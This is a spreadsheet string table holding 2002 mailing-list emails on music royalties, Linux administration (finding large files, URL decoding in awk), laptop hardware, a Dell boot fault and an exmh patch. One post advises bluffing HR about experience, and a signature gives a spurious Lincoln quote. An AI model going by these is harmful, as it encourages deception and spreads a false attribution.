    <t xml:space="preserve">On Tue, 27 Aug 2002 the voices made Robin Lynn Frank write:&gt; &gt; Tony Svanstrom, on SpamAssassin-talk, noted this US patent:
&gt; &gt;
&gt; &gt; http://appft1.uspto.gov/netacgi/nph-Parser?Sect1=PTO2&amp;Sect2=HITOFF&amp;u=/netah
&gt; &gt;tml/PTO/search-adv.html&amp;r=62&amp;f=G&amp;l=50&amp;d=PG01&amp;s1=spam&amp;p=2&amp;OS=haiku&amp;RS=spam&gt;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
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "M" == Mike Masnick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you.I don't endorse the whole RIAA thing, but to be accurate, you would
have to duplicate the chair so that both you and your neighbour could
continue to sit down, and yes, I suppose that would be more serious.They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money)But the label ... like Disney and Mickey, they need the cash cow so
they can keep all sorts of uncreative hangers-on in limos and coke.
If you thought only Elvis or Brian Jones or Dennis Wilson had problems
with beautiful-people deadbeat leech "friends" draining their riches,
think again.The problem is really very simple because it is semantic, and until we
make the semantic flip, it's unsolvable, but like trisecting an angle,
all it takes is looking at the same situation in a different
way.  Here's the revelation: Elvis never ever made a hit record.Elvis didn't make the hits, his /fans/ made the hits.  His fans did
the work cleaning toilets, manning the convenience stores, driving
milk trucks, sitting at endless office desks, they did the /real/
labour that paid for every last one of Elvis Presley's pills.  All
Elvis did was sing into a microphone every so often, and pen or
collect the odd song that all those /people/ liked and wanted as
something of their own.  But it's not _Elvis_ who made them universal
statements, it is the universe of fans who slurped the songs into
their own lives, it was pull-technology, not push.Therefore the question becomes: how many times must these fans pay
before they own what they themselves have created?  They pay royalties
for listening to the radio, for blank tapes, for concert tickets, for
a beer in a bar with a cover band ... they pay over and over and over
again for the /right/ to make some hack writer's song /their/
favourite song????  That's where the whole system has been seriously
warped by the record companies and ad companies reframing it into your
thinking that it is the Elvis who makes the Elvis.  It's not.  It's
the people who make them; the songs are already theirs.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t>&gt; Ultimately, there was a big
&gt; disagreement about how to sell the product (sales guys wanted to sell
&gt; the thing for a gazillion dollars to megaclients, but we thought it
&gt; would make more sense to get more people using it so we could get more
&gt; feedback from many different places).  The bottom line was that the
&gt; route we wound up going (megaclients for megabucks) had a megalong
&gt; sales cycle.  The sales force staffed up and tried to sell the
&gt; earliest releases of the software -- even succeeding in a few
&gt; significant cases -- but couldn't get enough to cover their own
&gt; expenses, much less the actual development of the product.Now where have I seen that before.... oh yeah... its happening to me right
now...</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "A" == Adam L Beberg  writes:    A&gt; I'm not displeased you're trying to help, just frustrated that
    A&gt; employers can demand such rediculous combinations of skills
    A&gt; with insane years of experience.&gt;&gt;&gt;From my 25+ years in the playing field, IMHO the art of job-hunting
(for those not yet de-jobbed) is the art of getting past the HR-stage
interview and into the engineer-to-engineer interview.  HR is not
being honest with you so there's no ethical quandry to be totally
honest with them: If they want experience numbers that would place you
in the OAK project, lead them to believe that you have "something
roughly equivalent" (ie "it wasn't 5 years, but it was three intense
years with plenty of overtime") -- they are playing a bluff in saying
/they/ know the job requirements so you're perfectly within poker
rules to bluff back to say you have it.If you /don't/ have the requisite Right Stuff, the engineers can
usually suss it out pretty fast during the second interview.  Most
often, their choice is based 90% on "who can I work with" and only
maybe 10% on "how much/little will we have to tutor this candidate?"-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve"> From the local paper this morning.
"Canadians eat about seven times as many doughnuts per capita"... (as 
Americans) . D'oh!Owen</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt; Barbara Blithered;
&gt; &gt; Others indicators this was a late invention are the use of the f rune
&gt; &gt; not only for "f", but inverted to mean "ff" (the welsh "v" phoneme) -&gt; Stew Stired; 
&gt; Isn't it the other way round, f(welsh)=v(english) ff(welsh)=f(english).Barbara Babbles;
Mea culpa. That's what I get for reading my welsh dictionary upside
down; "F"n trouble ;-).
Barbara------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Martin Mentioned:
&gt; &gt;I've used this a few times and can thoroughly recommend it. It really 
&gt; &gt;doeswork. Frankly, the only drawback is finding too much stuff.&gt;Rachel Rote; 
&gt; I'll be amazed if there's anyone on here who isn't already a heavy user!Barbara Babbles;
Be amazed - I've never bought anything online since an almighty cock up
with amazon dot con (that's not a typo) a few years back where I lost
all the dosh I'd paid them and had no books to show for it either. Had
it been the UK branch I'd have had them in the small claims court
quicker than you could drop LOTR on your foot and say "ouch", but as it
was the US branch I'd just no comeback.
Barbara------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">http://www.nme.com/news/102774.htmCAM'RON  associate  JUELZ SANTANA  has vehemently defended a lyric on the
forthcoming album by the pair's  DIPLOMATS  crew that pays tribute to
September 11 hijacker  OMAR ATTA
...------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; CAM'RON associate JUELZ SANTANA has vehemently defended a lyric on the
&gt; forthcoming album by the pair's DIPLOMATS crew that pays tribute to
&gt; September 11 hijacker OMAR ATTANo, Steve Earle at least USED to make great records.Martin------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t>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Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t xml:space="preserve">
Hi,all:Does anyone know how to list the biggest file in my
root directory?or the second biggest ..etc...Because I want to find out what is the reason cause my
root all most full.The system is Solaris 8 Sparc.Thanks !!!__________________________________________________
Do You Yahoo!?
Yahoo! Finance - Get real-time stock quotes
http://finance.yahoo.com-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>On Tue, 27 Aug 2002, Jon wrote:&gt;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*nix???Have done exactly this with debian, only I used a PCMCIA network card and
did it off ftp.esat.net (ucd bandwidth is rather good).However, if you've another machine, look into this null modem cable jobby:http://rosebud.sps.queensu.ca/~edd/t100cs.htmlwhether you can connect that to direct cable connectionI've no idea.  You
could however, put the files onto windows, boot onto a ILUG BBC[tm] and
mount the fat32 partition.Easier/Quicker way is to get your hands on a PCMCIA nic.  Also makes the
maptop far more useful in the long run.Gavin
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>If you're not in Doolin, beg, borrow, or steal your way there before
the LBW folk depart. It's far too much fun.Cheers,
Waider. Just back.
-- 
waider@waider.ie / Yes, it /is/ very personal of me.
"...we are in fact well and truly doomed. She says that if I leave now, 
 I can probably get a good head start before they realize that I'm gone."
                                                    - Jamie Zawinski-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Inn Share's [shareinnn@yahoo.com] 22 lines of wisdom included:
&gt; 
&gt; Hi,all:
&gt; 
&gt; Does anyone know how to list the biggest file in my
&gt; root directory?or the second biggest ..etc...
&gt; 
&gt; Because I want to find out what is the reason cause my
&gt; root all most full.$ find /dir -name \*  | xargs du -s | sort -nSmallest files are listed first with the largest at the end. So if
you want to get the 5 largest files, pipe through tail.e.g.$ find /dir -name \*  | xargs du -s | sort -n | tail -5
-- 
  Philip Reynolds        
   RFC Networks          tel: 01 8832063
www.rfc-networks.ie      fax: 01 8832041-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Philip Reynolds wrote:
&gt;&gt;Does anyone know how to list the biggest file in my
&gt;&gt;root directory?or the second biggest ..etc...
&gt; $ find /dir -name \*  | xargs du -s | sort -nYou might want to put a '-type f' on that find.Paul.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>On Tue, 27 Aug 2002, David Neary wrote:&gt; &gt; Actually the following would be in some way sensible:
&gt; &gt; echo -e "`echo "$enc" | sed 's/%\([0-9a-fA-F]\{2,2\}\)/\\\x\1/g'`"
&gt; 
&gt; Why {2,2}? Why not {2}?no idea.the above was something along the lines i was attempting, once i 
realised it was a straight swap. but i couldnt get awk's gensub to 
insert the \x for %'s and ='s.anyway, in the end i found something on the internet and adapted it:function decode_url (str,    hextab,i,c,c1,c2,len,code) {        # hex to dec lookup table
        hextab ["0"] = 0;       hextab ["8"] = 8;
        hextab ["1"] = 1;       hextab ["9"] = 9;
        hextab ["2"] = 2;       hextab ["A"] = 10;
        hextab ["3"] = 3;       hextab ["B"] = 11;
        hextab ["4"] = 4;       hextab ["C"] = 12;
        hextab ["5"] = 5;       hextab ["D"] = 13;
        hextab ["6"] = 6;       hextab ["E"] = 14;
        hextab ["7"] = 7;       hextab ["F"] = 15;        decoded = "";
        i   = 1;
        len = length (str);
        while ( i &lt;= len ) {
                c = substr (str, i, 1);
                # check for usual start of URI hex encoding chars
                if ( c == "%" || c == "=" ) {
                        if ( i+2 &lt;= len ) {
                                # valid hex encoding?
                                c1 = toupper(substr(str, i+1, 1));
                                c2 = toupper(substr(str, i+2, 1));
                                if ( !(hextab [c1] == "" &amp;&amp; hextab [c2] == "") ) {
                                        code = 0 + hextab [c1] * 16 + hextab [c2] + 0
                                        c = sprintf ("%c", code)
                                        i = i + 2
                                }
                        }
                # + is space apparently
                } else if ( c == "+" ) {
                        c = " "
                }
                decoded = decoded c;
                ++i;
        }
        return decoded
}&gt; Cheers,
&gt; Dave.&gt; PS the late reply is because the footer on the original mail (If
&gt; you received this mail in error yadda yadda) got caught in my
&gt; spam filter, and ended up in my junkmail directory.he he...might not have been the footer - check my headers. :)regards,
-- 
Paul Jakma	paul@clubi.ie	paul@jakma.org	Key ID: 64A2FF6A
	warning: do not ever send email to spam@dishone.st
Fortune:
One nuclear bomb can ruin your whole day.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Might just take a trip over there later tomorrow, it is after all only
on my backdoor-step...E.-----Original Message-----
From: ilug-admin@linux.ie [mailto:ilug-admin@linux.ie] On Behalf Of
Ronan Waide
Sent: 27 August 2002 21:19
To: ILUG list
Subject: [ILUG] doolin
If you're not in Doolin, beg, borrow, or steal your way there before the
LBW folk depart. It's far too much fun.Cheers,
Waider. Just back.
-- 
waider@waider.ie / Yes, it /is/ very personal of me.
"...we are in fact well and truly doomed. She says that if I leave now, 
 I can probably get a good head start before they realize that I'm
gone."
                                                    - Jamie Zawinski--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</si>
  <si>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Hi,I've got an normal 3.5" CD-RW IDE drive that I'd like to be able to use with a
Dell Latitude CPx laptop that I've got. Does anyone know any way to enable this,
for example through the use of a special cable for the Modular Bay (where CD-ROM
or floppy drive is normally).There is also the possibility of using a docking station, but Dell's docking
solution for the Latitude series doesn't seem to allow for the use of an IDE
drive, only SCSI... Unless someone knows of a "non-Dell" solution that's
compatible.Anyone any ideas?Thanks,Darren.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Darren Kenny wrote:
&gt; Hi,
&gt; 
&gt; I've got an normal 3.5" CD-RW IDE drive that I'd like to be able to use 
&gt; with a Dell Latitude CPx laptop that I've got. Does anyone know any way 
 &gt; enable this, for example through the use of a special cable for the
 &gt; Modular Bay (where CD-ROM or floppy drive is normally).There is absolutely no way to use a conventional 3.5" drive with a
laptop directly. However, you can get an external firewire or USB
cradle and attach it to the laptop like that, and any 3.5" drive
will work in that case.Example :http://www.microsense.com/USB_35_combo.aspRegards,Vin
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>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tail.Adding -r to the sort options, and piping through head instead,
might be a better idea. tail needs to read teh whole buffer, head
only reads the first n lines.Cheers,
Dave.-- 
       David Neary,
    Marseille, France
  E-Mail: bolsh@gimp.org-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>On Tue, Aug 27, 2002 at 11:38:00PM +0100, Vincent Cunniffe mentioned:
&gt; There is absolutely no way to use a conventional 3.5" drive with a
&gt; laptop directly. However, you can get an external firewire or USB
&gt; cradle and attach it to the laptop like that, and any 3.5" drive
&gt; will work in that case. Ah, they told me that about my A1200. Just got a video box, cut air holes
and a hole for the cables, then got an extra-long 2.5" to 3.5" IDE cable,
and connected it up. Had to make a few holes in the A1200 case for the
IDE cable too. Worked a charm. Until I dropped the disk one day onto concrete.Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Ok, Iknow this is blatantly OT but I'm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that's it, after some googling
I found some reference to re-seating all the parts, but no change.
The problem I'm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shout.Cheers,
Peter.--
Peter Aherne, Software Engineer, 
Motorola Ireland Ltd.
Ph: +353 21 4511234 Mobile: +353 87 2246834-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>John P. Looney wrote:
&gt;&gt;There is absolutely no way to use a conventional 3.5" drive with a
&gt;&gt;laptop directly.
&gt;  Ah, they told me that about my A1200.
&gt; 
&gt;  Worked a charm. Until I dropped the disk one day onto concrete.Go on. Tell them how long the /first/ one lasted.I vote external firewire if the laptop has the ports for it.Paul.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>I 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concrete.Go on. Tell them how long the /first/ one lasted.I vote external firewire if the laptop has the ports for it.Paul.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ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>&gt; -----Original Message-----
&gt; From: Aherne Peter-pahern02 [mailto:peter.aherne@motorola.com]
&gt; Sent: 28 August 2002 09:29
&gt; To: 'ilug@linux.ie'
&gt; Subject: [ILUG] [OT] Dell machine giving me hassle.
&gt; 
&gt; Ok, Iknow this is blatantly OT but I'm beginning to go insane.
&gt; Had an old Dell Dimension XPS sitting in the corner and decided to
&gt; put it to use, I know it was working pre being stuck in the
&gt; corner, but when I plugged it in, hit the power nothing happened.
&gt; I opened her up and had a look and say nothing much. A little orange
&gt; LED comes on when I plug her in but that's it, after some googling
&gt; I found some reference to re-seating all the parts, but no change.
&gt; The problem I'm having is that since the power supply is some Dell
&gt; specific one, ATX block with what looks like one of the old AT
&gt; power connectors, I cant figure out weather this is a Mobo prob
&gt; or a PSU prob. Just to futily try and drag this back OT, I want
&gt; to install Linux on it when I get it working. If anyone knows
&gt; what the problem might be give me a shout.
Here is what you do.Remove all the PCI &amp; ISA/EISA cards.
Remove the floppy disk cable from the mobo, the ide cables from the mobo...
essentially leaving only a video card... ram and a keyboard plugged in.Turn on the system.
If it doesn't POST then, switch it off and remove the video card.Switch it back on ... if your mobo doesn't emit some beeps complaining about
lack of video card then.Switch it off.
Remove it's ram.Same procedure as above.If you still don't have any kind of mobo beep codes then you can try as a
last ditch effort to reseat the cpu... (remembering to never ever ever power
up your system without a heatsink &amp; fan).If after reseating the cpu into the mobo... you still get no beep codes,
from it with just the cpu inserted into the mobo ie(no pci,*isa cards or and
no actual ide or floppy cables connected to the system)... even though you
have power... you either have a faulty motherboard or a faulty cpu.Once you get beep codes various permutations of the above should eventually
disjunct which device it is, is causing the lack of POST.
Power On Self Test.Bod-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>&gt;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shout.Ie if you are getting a little orange LED when you plug it in then your PSU
is probably working.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>John P. Looney wrote:
&gt;  I've two directories, that once upon a time contained the same files.
&gt; 
&gt;  Now, they don't.
&gt; 
&gt;  Is there a tool to merge the two - create a new directory where if the
&gt; files are the same, they aren't changed, if they are different, the one
&gt; with the most recent datestamp is used...Just for the record mc has a nice directory
comparison function. This is really nice
when using the ftp VFS for e.g. Of course
if you use something like ftpfs you can use
the previously mentioned tools.PÃ¡draig.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>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exited.Some expert help would be greatly appreciated as I'm sick and tired of
having to reboot, get into Windoze to hook up to the net and then back to
Linux, mounting this drive to get that file, etc.  It'd be nice never have
to go back to Windoze(except for games, that is).Thanks a million.
Carlos-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Paul Jakma wrote:
&gt; On Tue, 27 Aug 2002, David Neary wrote:
&gt; 
&gt; &gt; &gt; Actually the following would be in some way sensible:
&gt; &gt; &gt; echo -e "`echo "$enc" | sed 's/%\([0-9a-fA-F]\{2,2\}\)/\\\x\1/g'`"
&gt; &gt; 
&gt; &gt; Why {2,2}? Why not {2}?
&gt; 
&gt; the above was something along the lines i was attempting, once i 
&gt; realised it was a straight swap. but i couldnt get awk's gensub to 
&gt; insert the \x for %'s and ='s.Perl's pack() would do the job...&gt; &gt; PS the late reply is because the footer on the original mail (If
&gt; &gt; you received this mail in error yadda yadda) got caught in my
&gt; &gt; spam filter, and ended up in my junkmail directory.
&gt; 
&gt; might not have been the footer - check my headers. :)Actually, it was worse - a bodycheck showed up a "remove" URL. I
need a new spam filter (but I want to be able to process false
positives, rather than dump them).Cheers,
Dave.-- 
       David Neary,
    Marseille, France
  E-Mail: bolsh@gimp.org-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Inn Share wrote:
&gt; Hi,all:
&gt; 
&gt; Does anyone know how to list the biggest file in my
&gt; root directory?or the second biggest ..etc...
&gt; 
&gt; Because I want to find out what is the reason cause my
&gt; root all most full.
&gt; 
&gt; The system is Solaris 8 Sparc.
&gt; 
&gt; Thanks !!!I think everybody has their own version of this,
but in case it's useful.. (only tested on Linux):find $* \( -type f -o -type l \) -maxdepth 1 -mindepth 1 -print0 |
xargs -r0 du -b --max-depth 0 |
sort -k1n |
grep -v "^0"PÃ¡draig.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Inn Share  writes:&gt; Hi,all:
&gt; 
&gt; Does anyone know how to list the biggest file in my
&gt; root directory?or the second biggest ..etc...
&gt; 
&gt; Because I want to find out what is the reason cause my
&gt; root all most full.find / -xdev -type f -exec du -sk {} \; | sort -rn | head -5        -xdev will stop find recursing into other filesystems.Cheers
Tiarnan
-- 
TiarnÃ¡n Ã“ CorrÃ¡in
Consultant / System Administrator
CMG Wireless Data Solutions Ltd.
Tel.: +353 21 4933200
Fax: +353 21 4933201-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>David Neary wrote:
&gt; Padraig Brady wrote:
&gt; 
&gt;&gt;&gt;Paul Jakma wrote:
&gt;&gt;&gt;
&gt;&gt;&gt;&gt;chars in hex to plain ASCII?
&gt;&gt;&gt;&gt;
&gt;&gt;&gt;&gt;eg given
&gt;&gt;&gt;&gt;   http://w%77%77%2Eo%70%74%6F%72%69um.n%65t/remove.html
&gt;&gt;&gt;&gt;
&gt;&gt;&gt;&gt;is there an easy way to turn it into
&gt;&gt;&gt;&gt;
&gt;&gt;&gt;&gt;   http://www.optorium.net/remove.html
&gt;&gt;&gt;&gt;eg, whether by piping through some already available tool, or 
&gt;&gt;&gt;&gt;programmatically (printf? - but i dont see how.).
&gt;&gt;&gt;
&gt;&gt;Actually the following would be in some way sensible:
&gt;&gt;echo -e "`echo "$enc" | sed 's/%\([0-9a-fA-F]\{2,2\}\)/\\\x\1/g'`"
&gt; 
&gt; 
&gt; Why {2,2}? Why not {2}?Me being silly, that's all.PÃ¡draig.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t xml:space="preserve">
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things).Just my 2 cents.MishaOn Wed, 28 Aug 2002, Aherne Peter-pahern02 wrote:&gt; Ok, Iknow this is blatantly OT but I'm beginning to go insane.
&gt; Had an old Dell Dimension XPS sitting in the corner and decided to
&gt; put it to use,
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>On Fri, Aug 23, 2002 at 09:26:47AM +0100, Padraig Brady wrote:
[...]
&gt; probably a bit old, 7.3 and 8.0 are out.And I've been told by a SuSE rep that 8.1 will be out in October,
for those who are interested.David	-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Hi all,I've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;-)I've got the whole thing working on a Valhalla system, but the packages
should easily install or at least recompile on Enigma, Limbo/(null) and
maybe others, who knows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packageNow go to this URL and find out what you need to change in your
/etc/modules.conf file to replace the default OSS driver loading :
http://www.alsa-project.org/alsa-doc/
(very complete and very good documentation!)
Hopefully you'll see that your card *is* supported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default.With "aplay" you can already test files to see if you hear anything. You
can also install the XMMS plugin (seems to make my XMMS segfault on exit...
hmmm, but maybe it's another plugin) to listen to your good ol' mp3
files... that's it!It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architecture!).I'm open to any comments or suggestions about these packages!Download :
http://ftp.freshrpms.net/pub/freshrpms/testing/alsa/Current spec files :
http://freshrpms.net/builds/alsa-driver/alsa-driver.spec
http://freshrpms.net/builds/alsa-lib/alsa-lib.spec
http://freshrpms.net/builds/alsa-utils/alsa-utils.spec
(All others, patches etc. : http://freshrpms.net/builds/ )MatthiasPS: As an extra bonus, I've also recompiled xine with alsa support! Simply
run "xine -A alsa09" and off you go! It may even support 5.1 and S/PDIF ;-)-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
Load : 0.57 0.42 0.42, AC on-line, battery charging: 29% (1:55)_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>While I was playing with the past issues, it annoyed me that there was
no easy way to make the log stop growing (I don't mean to truncate it,
I mean to just freeze it for a while).The following patch adds a new button to the log window, which allows
the log to be switched on/off (the button says "Disable" when the
log is enabled, and the button disables it, and "Enable" when the log
is frozen, and the button enables it again).kre--- main.tcl	Wed Aug 21 15:01:48 2002
+++ /usr/local/lib/exmh-2.5/main.tcl	Wed Aug 28 17:36:59 2002
@@ -385,6 +385,9 @@
 	ExmhLogCreate
 	wm withdraw $exmh(logTop)
     }
+    if {! $exmh(logWrite)} {
+	return
+    }
     if [info exists exmh(log)] {
 	catch {
 #	    $exmh(log) insert end " [bw_delta] "
@@ -407,6 +410,9 @@
     set exmh(logWindow) 1
     Exwin_Toplevel .log "Exmh Log" Log
     set exmh(logTop) .log
+    set exmh(logDisableBut) \
+	[Widget_AddBut $exmh(logTop).but swap "Disable" ExmhLogToggle]
+    set exmh(logWrite) 1
     Widget_AddBut $exmh(logTop).but trunc "Truncate" ExmhLogTrunc
     Widget_AddBut $exmh(logTop).but save "Save To File" ExmhLogSave
     set exmh(logYview) 1
@@ -457,6 +463,12 @@
     } msg] {
 	Exmh_Status "Cannot save log: $msg" error
     }
+}
+proc ExmhLogToggle {} {
+    global exmh
+
+    set exmh(logWrite) [expr ! $exmh(logWrite)]
+    $exmh(logDisableBut) configure -text [lindex {"Enable " Disable} $exmh(logWrite)]
 }
 #### Misc
_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.cnn.com/2002/WORLD/americas/08/26/peru.mother.reut/index.htmlLIMA,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Caesarean to deliver her baby, they found she already had fully mature sexual organs. Her swelling stomach worried her parents. "They thought it was a tumor," he said. But shamans ruled out village superstitions -- including one in which locals believed a snake grew inside a person until it killed them -- and recommended they take her to hospital in the nearest big town, Pisco. There came the staggering diagnosis that she was pregnant. Her father was jailed temporarily on suspicion of incest -- he was later released for lack of evidence -- and doctors, police and even a film crew set off for her village for preliminary investigations into her case. Sandoval, who based his book on media and other published information, and some interviews with relatives as Medina herself declined to comment, said news of the child mother-to-be drew instant offers of aid, including one worth $5,000 from a U.S. businessman, which was turned down. More offers followed after Medina was transferred to a Lima hospital, where her fully developed 6-pound (2.7 kg) baby was born on May 14, 1939 -- Mother's Day. One offer was worth $1,000 a week, plus expenses, for Medina and her baby to be exhibited at the World's Fair in New York. Another, from a U.S. business that the family accepted in early June 1939, was for the pair to travel to the United States for scientists to study the case. The offer included setting up a fund to ensure their lifelong financial comfort. But within days, the state trumped all previous offers, decreeing that Medina and her baby were in "moral danger," and resolving to set up a special commission to protect them. But Sandoval said: "It abandoned the case after six months ...It did absolutely nothing for them." Happy ending?
Though physically mature, Medina -- who Sandoval said was mentally normal and showed no other unusual medical symptoms -- still behaved like a child, preferring to play with her dolls instead of the new baby, who was fed by a wet nurse. Medina stayed in hospital for 11 months, finally returning to her family after it began legal proceedings that led to a Supreme Court ruling allowing her to live with them again. After taunting from schoolmates, Gerardo -- who was named after one of the doctors who attended Medina and became their mentor -- discovered when he was 10 that the woman he had grown up believing to be his sister was in fact his mother. He died in 1979 from a disease that attacks the body's bone marrow, but Sandoval said it was not clear there was any link with his illness and the fact his mother had been so young. Medina married and in 1972 had a second son, 33 years after her first. Her second child now lives in Mexico. She appears to have turned her bizarre story into a taboo subject. "We just want to get on with our lives, that's it," said Jurado, adding he thought "absolutely nothing" of the fact his wife was the world's youngest mother. He said the couple's main concern now, if the government's offer of aid was genuine, was to be granted the value of a property that belonged to Medina and which the then-government expropriated more than two decades ago. That house has now been destroyed and there is a road on the site. He said its value was "more or less $25,000" and settling the property question would conclude a long legal battle to get back a home of their own -- they live now in a modest house, accessed down a dingy alley half blocked by a wooden board, in a tough neighborhood known to locals as a thieves' paradise. "If the government really wants to help...they should give us the value of our property," he said. As for Sandoval, he said he was optimistic that Medina's story, which he has studied since his student days, would turn out well. "I believe there will be a happy ending," he said. "As a result of the war, corporations have now been enthroned and an era
of corruption in high places will follow and the money-power of the
country will endeavor to prolong its reign by working upon the
prejudices of the people until the wealth is aggregated in a few hands
and the Republic is destroyed."
Abraham Lincoln (Nov 21, 1864 in a letter to Col. William F Elkins)[Non-text portions of this message have been removed]
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Barbara wrote:
Pictish pictograms (still undeciphered)
-----------------------
